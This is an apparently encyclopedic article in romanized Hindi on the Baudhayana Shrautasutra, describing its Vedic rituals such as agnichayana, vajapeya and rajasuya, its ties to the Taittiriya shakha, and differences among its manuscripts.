uparyukt padvoan mean vaijayantikar mahadev ne taittiriy shakha ke baudhayan, bharadvaj, apastamb, hiranyakeshi, vaikhanas, vadhool – in sootrakaroan ka kram se nirdesh karake unhean pranam kiya hai. inamean baudhayan ka nam pratham hai.[1] aur any nam; vadhool ko chho dakar, aitihasik kram se bhi yukt haian. pahala nam bodhayan aur baudhayan – in do prakaroan se hi likha gaya hai. vyakaran ki drishti se 'budh' shabd se gotrapatyadarshak baudhayan shabd siddh hota hai tab adivriddhi hoti hai, kintu prachin kal se bodhayan shabd hi sarvatr roodh hai.

yajurved

yajurved adhvaryu–ved hai. yajn mean adhvaryu aur usake sahayakoan ke kary ka vivaran yajurved aur usase sambaddh granthoan mean milata hai. yadyapi yajn, vishesh roop se somayag mean char pradhan rritvijh hote haian, to bhi unamean adhvaryu ka kary adhik mahattvapoorn hota hai. sayanachary ne taittiriy sanhita–bhashy ke upodghat mean likha hai ki tin vedoan mean se yajurved bhittisthaniy hai. yadi bhitti n ho to chitr kahaan aankit kiya jae? yajurvediy sahity mean adhvaryu ke sath hi yajaman aur brahma namak rritvik ka kary bhi niroopit hai.

sootr–rachana

agrayaneshti

agni chayan

10vean prashn mean agni–chayan ki vidhi vistar se upavarnit hai. somayagagat uttaravedi ke sthan mean ishtakaoan ki paanch chitiyaan ek ke oopar doosari ke kram se rachi jati haian. is chiti par ahavaniyagni ki pratishthapana karake usamean somayagadi sampann kie jate haian. agni–chayan ek vistrit karm hai, at: ise yag nahian kaha ja sakata.

vajapey

11vean prashn mean vajapey ka vivaran hai. yah ek ekah somayag hai. isamean 17 rathoan ki shakati hoti hai jo yajaman janita hai. yajaman aur usaki patni svargarohan ka abhinay aur bhavana karate haian. yajaman ka abhishek hota hai. kshobh ke sath soora ka bhi prakampan hota hai. brahman aur rajany is yag ke adhikari haian. vajapey ji ko b da samman prapt hota hai.

rajasooy

12vean prashn mean rajasooy ka vivaran hai. is yajn ka adhikari raja mana gaya hai. isamean anek ishtiyaan aur somayag sammilit haian. anek prakar ki jalarashi se yajaman ka abhishek hota hai. rajyadhikar ke anukool kuchh vidhiyaan isamean samavisht haian. samanyat: ek varsh se adhik kal tak isaka anushthan chalata hai.

kamy ishti

13vean prashn mean anek kamy ishtiyoan ka vivaran hai.

aupanuvaky

14vean prashn ka vishay hai aupanuvaky. isaka adhar taittiriy sanhita ka tisara kand hai jo aupanuvaky hi kahalata hai. isamean mantr–brahman mishrit anek vishay haian. chauthe vaishvadev kand mean jo vishay antarbhoot haian, unamean ek hai aupanuvaky, arthath sarasvatapath[5] ki taittiriy sanhita ka sampoorn tisara kand. is kand mean kram se jo vishay ae haian, chahe ve mantr hoan ya brahman, unaka usi kram se vivaran baudhayan sootr ke 14vean prashn mean hai. at: usaka svaroop any prashnoan se bhinn hai. svabhavik tha ki isamean brahman aansh kuchh adhik praman mean uddhrit hota. isase spasht hai ki baudhayan ke samay mean taittiriy shakha ka arshey path supratishthit tha. satyashadh prabhriti any grihyasootroan mean arshey path ke chhah, char ya nau kand mane ge haian.

uttaratati:

24vean prashn ke arambhik khandoan mean aise vishay ae haian, jinhean paribhasha kaha ja sakata hai.

prayashchitt sootr

27vean se 29vean tak ke tin prashn prayashchitt sootr haian. inamean agnihotr se lekar satr tak sabhi vidhiyoan ke sambandh mean prayashchitt sangrahit haian. naimittiki vidhi bhi isi mean samavisht hai.

shulbasootr

30vaan prashn shulbasootr hai aur usake pashchath pravarasootr hai, jisaki prashn sankhya nahian di gee hai.

shakhagat kram

taittiriy shakha, jisase baudhayan shrautasootr ka sambandh hai, sootr rachana se poorv supratishthit thi. sootrakar ne mantroan ko shakhagat kram se uddhrit kiya hai. brahman vakyoan ko uddhrit karate samay vah 'ath vai yajati' shabd dete haian, kintu taittiriy brahman ke dvitiy kand ke saptam prapathak (achchhidr kand) ka koee aansh baudhayan sootr mean uddhrit nahian kiya gaya hai. kandanukram ke anusar chaturth vaishvadev kand mean 'achchhidrani' antarbhoot hai. taittiriy brahman[6] mean darshapoornamaseshti ka hautr sangrahit hai, jisaka viniyog baudhayan sootr mean pradatt hai. apani shakha se to baudhayan ekanishth hai hi, sath hi kathak shakha ka bhi kuchh prabhav unaki rachana par pratit hota hai. is shakha ke kuchh mantroan ka viniyog baudhayan ne diya hai. baudhayan sootr tandyamahabrahman, shadaviansh brahman, paingalayani brahman, chhagaley brahman tatha rrigved prabhriti ke bhi sandarbh milate haian.[7] anek samoan ka bhi nirdesh hai.

vaividhy

baudhayan kalpasootr mean shulb sootr ke aant tak 32 prashn pariganit haian, kintu mudrit sootr mean unaki sankhya 30 hai. baudhayan shrautasootr ke hastalekhoan mean pathakram ke vaividhy ka anubhav hota hai. kisi hastalekh mean prashn agnishtom se poorv aur kisi mean pashchath. sautramani yag do prakar ka hai– charak aur kaukili. vidyaman sootr mean kaukili hai hi nahian. baudhayan shrautasootr ke bhashyakar bhavasvami ne likha hai ki baudhayan shrautasootr ka kaukili sautramaniparak aansh nasht ho gaya hai. usake poorv astitv ke praman sootr mean bhi haian. baudhayan shrautasootr ki bhasha–shaili bhasha ke sadrish hai. baudhayan shrautasootr ke sampadak d aau. kaland ne isaka vistrit adhyayan prastut kiya hai.
